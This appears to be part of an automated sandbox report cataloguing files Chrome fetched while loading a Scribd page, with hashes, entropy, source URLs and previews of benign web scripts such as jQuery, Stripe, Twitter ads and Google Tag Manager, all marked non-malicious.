                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (32012)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):69597
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.369216080582935
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                                                                                                                                                                                                                                                                                                                                                        MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (325)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):404
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.440224841042024
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:+hjquD7sDjquDZdOrg/d9eVWAyJQrAIfcB2eGQdhQ7gO9lTHHKHnERQD1KfcpD7L:+dLsLKgSVWtQwH2RTHy4QpKy5lw8
                                                                                                                                                                                                                                                                                                                                                                                        MD5:B1344222AB62EA3DBF8AF803166F779A
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1278C05AA635EEE2D60C35E2393C624AC7C247CA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1661E52D74FBFE30535B083B68BC32A192E342A1E64609448DCAA55B308D7525
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:61B66058D4DD1BF562500E7B1D4414F4C81E4208FBDCD33DBF90E046EC8D72F8879A11203F48CC9E3FFC6BDA87D02F1384080B5F8D212F165FDE0270DD7F1311
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/479.72a596.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[479],{97479:(e,a,c)=>{c.r(a),c.d(a,{default:()=>o});var s=c(96540),t=c(38544),d=c(37594),n=c(78458);function o({id:e}){const a=(0,t.wA)();return s.createElement(d.yq,{hideCloseButton:!0,onCloseModal:()=>a((0,n.JY)(e))})}}}]);.//# sourceMappingURL=https://www.scribd.com/webpack/doc_page/479.72a596.js.map
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (526), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):526
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.844995662196588
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:c4GJ0k2lvgyT6d1uOMXUZsCxYADLsdfPw3CgrR5jddeU7nu:c5D2BtT67uOMXUZjxYOLsOCgrN80u
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D96C709017743C0759CF3853D1806BA5
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:72E21587610C49C8305A55E71F73FA88ED618205
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:BA2338AA6670580269C762F51C4291DAEF913201AA8F4D4FD166C1A878262652
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:974E260ED8BD1D99628FC3248F07179F6EA228E37A6B9D3EF906DBA57571F2DF54D73F93D1F3460902D28A90BD4793BCA35477B2EF8FBF424B9112147F04BCCF
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:!function(){"use strict";var e="https://m.stripe.network",n=window.location.hash,t=/preview=true/.test(n)?"inner-preview.html":"inner.html",o=document.createElement("iframe");o.src="".concat(e,"/").concat(t).concat(n);var i=function(n){if(n.origin===e){var t=window.opener||window.parent||window;if(!t)return;t.postMessage(n.data,"*")}else o.contentWindow.postMessage(n.data,"*")};window.addEventListener?window.addEventListener("message",i,!1):window.attachEvent("onMessage",i),document.body&&document.body.appendChild(o)}();
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):375564
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.44503024791353
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:aJ/qhSG+5iT75/lXFnEls70q82rhQvl6ZtlCzl4WissgzHu/hoMClZvD6DlJgCbf:aJ/qhM5iT75/lXFnEls70q82rhQvEZTj
                                                                                                                                                                                                                                                                                                                                                                                        MD5:52A8560347B92A56F62477B5552ED904
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:97062C9F09A67F4331106C44CF4FD5147294935C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:71B4D54B75C99AE6D72BB26C9B9191045397FDA7D084EF695EBF882E4F0A2872
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E9C27F3DFE0041D2BAFD6C18CA3FC25D1B13A1DC26DC79874EF459B2CD75FAEF955CB7F999AE7BDB715E35D181B67BE191C9890E46B6CD4CA85DBFB97E7D3A6F
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/app.d6ad9e.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[524],{75875:(e,t,n)=>{"use strict";n.d(t,{A:()=>d});var r=n(38544),o=n(62832),s=n.n(o),a=n(40880),i=n(96540),l=n(30686);function c({copyright:e,headingLevel:t,inline:n}){return i.createElement("div",{className:s()("auto__app_page_body_metadata_copyright","data_row copyright",{inline:n})},function(){let e=a.A.t("pdfs.sidebar.copyright_no_colon");return n&&(e=a.A.t("pdfs.sidebar.copyright")),i.createElement(l.A,{level:t},e)}(),function(){let t=`${String.fromCharCode(169)} ${e}`;return n&&(t=e),i.createElement("div",null,t)}())}c.defaultProps={headingLevel:3,inline:!0};const d=(0,r.Ng)((e=>({copyright:e.wordDocument.copyright_name})))(c)},77434:(e,t,n)=>{"use strict";n.d(t,{K:()=>d});var r=n(40880),o=n(96540),s=n(38544);const a="_2YHt5Y",i="n5d7Gp",l="_2Lyzye",c=({heading:e,text:t})=>o.createElement("div",{className:a},o.createElement("div",{className:i},e),o.createElement("div",{className:l},t)),d=()=>
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65473)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):308493
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.42001093614717
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:zZUfODvfYgFOJNkAusB/M+OXJb+UtXvmZ+bWh/qpOr:zZUfPguua/M+KC
                                                                                                                                                                                                                                                                                                                                                                                        MD5:61F01DAF41A3CAEA2F0BADC4B5971FC5
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1E377416218E56C3DF12FB0FCCEF346E16BA63D5
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:763DC672B3BDEEFBA9FB9E25EBFAAA6928AD359E6D188995A3CD40969402C231
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8C4E44D6DA73F3E78DA963DE0EF426725E75EE4AEA599D7C7032EE87D3925CFEE79C5986E0A4F8EDA14DD34FED0550DB727633B1033E4E145DA462B630239629
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*! For license information please see osano.js.LICENSE.txt */.(()=>{"use strict";var e={558:(e,t,r)=>{t.SS=void 0;var o=r(717),n=function(){var e=[],t=[],r=void 0;return{enhancer:function(e){return r=e,function(e){return function(r){return o.compose.apply(void 0,t)(e)(r)}}},addMiddleware:function(){for(var o,n,a=arguments.length,i=Array(a),c=0;c<a;c++)i[c]=arguments[c];(o=t).push.apply(o,i.map((function(e){return e(r)}))),(n=e).push.apply(n,i)},removeMiddleware:function(r){var o=e.findIndex((function(e){return e===r}));-1!==o?(e=e.filter((function(e,t){return t!==o})),t=t.filter((function(e,t){return t!==o}))):console.error("Middleware does not exist!",r)},resetMiddlewares:function(){t=[],e=[]}}},a=n();a.enhancer,a.addMiddleware,a.removeMiddleware,a.resetMiddlewares,t.SS=n},717:(e,t,r)=>{r.r(t),r.d(t,{__DO_NOT_USE__ActionTypes:()=>l,applyMiddleware:()=>h,bindActionCreators:()=>v,combineReducers:()=>g,compose:()=>m,createStore:()=>d,legacy_createStore:()=>u});var o=r(24);function n(e,t
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (58876), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):58876
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.405683338218142
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:buY9NdAkLYPFvFkxF94zPnSJpSFDKNo5/H:buQdApFoF94zPnSJpSFDP5/H
                                                                                                                                                                                                                                                                                                                                                                                        MD5:4328E910DE583AD53B3A7A76455AF005
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E040010E5EF4121A3A163AACDC664D6AA4AFEC74
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D4963B8AFEBFA0063B5D17B4C80F49BCE702A37EA5C9B91BB3C996BB9DEA4B60
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F807BA8B0AE2D5387E93E292918EEB4D7D1AC7635566A38EE2E101FBE8A7C6C23E704770EFCB1401EB5D1385605CBFB15F0A840AC150770049D2A4D6CA9A0DFA
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://static.ads-twitter.com/uwt.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:!function(){var t={6173:function(t,e,n){var r;t.exports=(r=r||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&void 0!==n.g&&n.g.crypto&&(r=n.g.crypto),!r)try{r=n(2480)}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")},o=Object.create||function(){function t(){}return function(e){var n;return t.prototype=e,n=new t,t.prototype=null,n}}(),a={},c=a.lib={},u=c.Base={extend:function(t){var e=o(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2452573
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.592048609772475
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:VzLEBv1OwNehqstpgNwVZewzctzz1TR5YndmSxbnlNK:VzLEzNegsgwfeIct31t5YndmSxbnlNK
                                                                                                                                                                                                                                                                                                                                                                                        MD5:A440E0545E5A5146F10F90DF2EA13A56
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3AD6E90D8D33A4F4692F807BA03FF0CB15A1A0DE
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:2BA8CDBA758F6E01D09D652D19D690741B1F64790AF0AD705FC293D575CAEDE0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:DAA84F0764FBD3D7A9F5E5F04369D6979AC9A068961F1A25EE7C209B3605614E9DD212FADC6F54A10138D52CFE2797427062E8ED9F6070EB8116B5B02C27BA42
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/245.799c3a.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[245],{41033:(e,t,n)=>{e.exports=function(){var e={228:function(e){e.exports=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,r=new Array(t);n<t;n++)r[n]=e[n];return r}},858:function(e){e.exports=function(e){if(Array.isArray(e))return e}},506:function(e){e.exports=function(e){if(void 0===e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}},926:function(e){function t(e,t,n,r,a,i,o){try{var s=e[i](o),l=s.value}catch(e){return void n(e)}s.done?t(l):Promise.resolve(l).then(r,a)}e.exports=function(e){return function(){var n=this,r=arguments;return new Promise((function(a,i){var o=e.apply(n,r);function s(e){t(o,a,i,s,l,"next",e)}function l(e){t(o,a,i,s,l,"throw",e)}s(void 0)}))}}},575:function(e){e.exports=function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}},913:function(e){function t(e,t){for(var n=0;n<t.len
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10235)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):440062
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.635511770377815
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:O4B3ZuduK3zYqUEz+hbxpYRGPVmT4yahWLml9RM:XBJK3Uqpgxy4Q
                                                                                                                                                                                                                                                                                                                                                                                        MD5:544F3D32009448E55F15EC1546335F7F
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:EB077315C7A9631D2CDFAC23C3E436D1A69EA3EC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D61793C12307885E4D5A15E953513B94B8EB6C7C7855D31B4A29BEBA52AB3161
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:728F5F81BC976052FE7D43100BE3390CDFD85DA4808092F5C3262B26D8DFC4A6EB8B41535F36B600F5357ECBA8F67D653381BF3C809E7D3D51AA5F90F74E545C
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtag/js?id=G-Z4ZC50DED6&l=dataLayer&cx=c&gtm=45He4c40v78386455za200
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":18,"vtp_value":true,"tag_id":11},{"function":"__ogt_referral_exclusion","priority":18,"vtp_includeConditions":["list","scribd\\.com","paypal\\.com"],"tag_id":13},{"function":"__ogt_session_timeout","priority":18,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":14},{"function":"__ogt_dma","priority":18,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":15},{"function":"__ogt_1p_data_v2","priority":18,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (815)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3501
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.383873370647921
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:EI5cZUiKliCJ86U+QTEVWfeLwTauSEegdkZ5edOIC:EI5hiWNJ8kQTEVWfeUauRfdkZ5edO1
                                                                                                                                                                                                                                                                                                                                                                                        MD5:147FD3B00C22BA9C939712E9213C24CA
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3B48369B86FA0574F35379AACD1F42CC9C98A52B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:70F5B11C1870CF90201A6D5F770CA318A3FA5827C74A8765EDE22B487F7D4532
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E8419A71232EDAC8FD131446777F7D034B3171EFE07B3267479B439E4982650DB65A0D1DDC9F516315D5ED1B01ECFD2F7EB55D75D44AA51EE0AD494D441586D2
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/static/service_worker/4c30/sw_iframe.html?origin=https%3A%2F%2Fwww.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html>.<head>. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">.</head>.<body>. <script>.'use strict';class m{constructor(a){this.j=a;this.g={};this.h={};this.i=0;this.id=String(Math.floor(Number.MAX_SAFE_INTEGER*Math.random()))}}function n(a){return a.performance&&a.performance.now()||Date.now()}.var p=function(a,b){class d{constructor(c,g,f){this.failureType=c;this.data=g;this.g=f;this.h=new m(n(f))}s(c,g){const f=c.clientId;if(c.type===0){c.isDead=!0;var e=this.h,h=n(this.g);e.g[f]==null&&(e.g[f]=0,e.h[f]=h,e.i++);e.g[f]++;c.stats={targetId:e.id,clientCount:e.i,totalLifeMs:Math.round(h-e.j),heartbeatCount:e.g[f],clientLifeMs:Math.round(h-e.h[f])}}c.failure={failureType:this.failureType,data:this.data};g(c)}}return new d(5,a,b)};/*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/.let q=globalThis.trustedTypes,r;function t(){let a=null;if(!q)return a;try{const b=d=>d;a=q.createPolicy("goog#html",{createHTML:b,createScript:b,crea
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):621
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.673946009263606
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                                                                                                                                                                                                                                                                                                        MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
                                                                                                                                                                                                                                                                                                                                                                                        Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 149x198, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3100
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.9448080117813475
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:JzQbPfXTEgWm3dL6/ALrgsfbYkESN3smds/1BT3i7Zzbv:+bPvTNWmNJXgwcqNvs1lS7ZzL
                                                                                                                                                                                                                                                                                                                                                                                        MD5:162719921B1D3A557F736066F540273D
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:307816B7A1FE746503382D62CC099A434AEBAC5C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:981BD6A9134D07913B51F62788DE4946B2EC068BE48788A16887094A6493FC19
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B2F7CDE6A559A05FD6D56BA6F2B9A626D2FF6D80979CFDEE65975378853272B7D06E2E420E97EAB9C61ECFEC87923310D7E1C85BBD62FC62EFD1DA656FC2E6C2
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://imgv2-1-f.scribdassets.com/img/word_document/224410406/149x198/b245e05319/1731318738?v=1
                                                                                                                                                                                                                                                                                                                                                                                        Preview:RIFF....WEBPVP8 ....p9...*....>m0.H$"..$.l...in._`)....{N...o..t{E.A......O....r..........~/.....N.........e.w./....?.}M.].}.......?......_......;...........w........1...!=...R..+.c...,}V....W\.Cq8z_.?..W.l.8N.*.pFD......)g.DJ^Ln..,~.O.g<.....5.r.6r..,...W.j.@p]...D......{.:~......9..%..H...../d... .p.I.$.o{s#.A_a.......V..9.nL.IX.......0...u........].. +D...u.7#....^...a..B ...a...._....-.r.e...o(....NO.>.....{..U....f.EQ...P.q4.FK......\U.g.....7s.d..6.R..{a.....f......s..K...@9h..#....8....4.>.;u....+....|.qo.S.<.9/.......Q...g.d^.|{`>J].z7..V0.b.=...p,Am.nFY......#......W7p..fB...s.0>$N)..u..... -.........'W.....N.;....iu.45...v?'p3....Z.ky.4V....Q4.j...5O....q.-3.....~`.{.CQ...b.p.G.$.F....i..p{...&eU(S.]I.....I........k........DA!<......9..y../Y....@.,'.n^...D.6..)..].2.B{.......oF...>....@...sf..L >>P?=.J..SR.N.....Z.m....@b..u...p..(v......IsM.wI..$.3.*A..H....eZU3C.....9.84.....i.J[rY..`.hd[.J..t.V.S.;...!....Fa..I..j....b..4%*R..f...$..
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (631)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):710
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.283912482725139
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:+dLsLKC0vFgJYeJsnE+pJQggdoxymZMJDjM1NqVN9gGvPdlkySV:iIeCaFg5Ji9JQ3oxybZM1oVfBm
                                                                                                                                                                                                                                                                                                                                                                                        MD5:2A94BAF33F298C352DD5509F693B0030
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:298A49CA4BE36B757F19163D4BCA292DE06C3DA7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5B509B5BBFA2EE38542420EBD2E141FEDC098C8553670AA7CC748F5BE30DC448
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:BDB04EDA540BBE83AB7DC2D3CB198D8A2BC9ADE8858EDCB9BDE054F374ED79FE7647789AC576A6F5EA8254A859C61FED94A041632B186FB869B456B19F39829C
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/806.acb1c9.js
